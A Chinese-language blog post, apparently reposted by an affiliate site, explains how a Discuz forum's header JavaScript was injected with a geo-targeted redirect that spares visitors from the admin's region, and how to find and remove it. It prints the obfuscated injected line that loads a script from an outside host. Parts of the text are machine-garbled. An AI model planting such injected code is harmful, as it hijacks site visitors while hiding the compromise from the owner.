網站被掛馬，非管理員訪問自動跳轉到廣告頁面解決辦法

你是否遇到過你的網站打開一會就自動跳轉到其餘頁面，並且這個問題是你的用戶告訴你的，而你本身卻沒有遇到?

網站被掛馬，非管理員訪問自動跳轉到廣告頁面 怎麼解決

discuz掛馬彈出頁面

通過蔥子我細心的對掛馬網站作排查，終於讓我找到了問題所在。

掛馬者是經過在discuz的頭部js文件裏面添加了劫持js代碼，經過判斷訪問者的IP來實現不一樣跳轉的。

具體代碼以下：

document.write("<163"+"cript src='http://141"+"d.172"+"om"+"1263"+".n"+"et/i"+"p.asp?l"+"oc=chengdu'></s"+"cript>");

能夠看出，後面有個「chengdu」代碼，這段代碼的意思就是IP爲成都地區的訪問者在訪問被掛馬頁面時不作跳轉。其他地區的IP訪問者則跳轉。

從這段代碼咱們就能夠看出掛馬者是多麼的用心險惡。

他首先根據你網站所在地進行判斷網站管理員常常使用的IP地址所在地，而後有針對性的對網站管理員不作跳轉劫持。

因此，這種劫持的狀況下，網站管理者很是難以發現到網站被掛馬了。

解決辦法也比較簡單：

首先校驗下原始文件，對比下哪些js文件近期有被改動過，而後針對被改動過的js文件作以上代碼段的排除。找到以上代碼段後，刪除便可。

最後說一下，各位網站管理者必定要注意保管好網站和服務器的管理密碼，儘可能設置的複雜一點。同時也要及時檢測服務器是否存在漏洞等，及時作針對性處理，以免相似的事情再發生。

本文由甲爪cpa聯盟整理編輯！原文連接www.jiazhua.com 轉載請註明！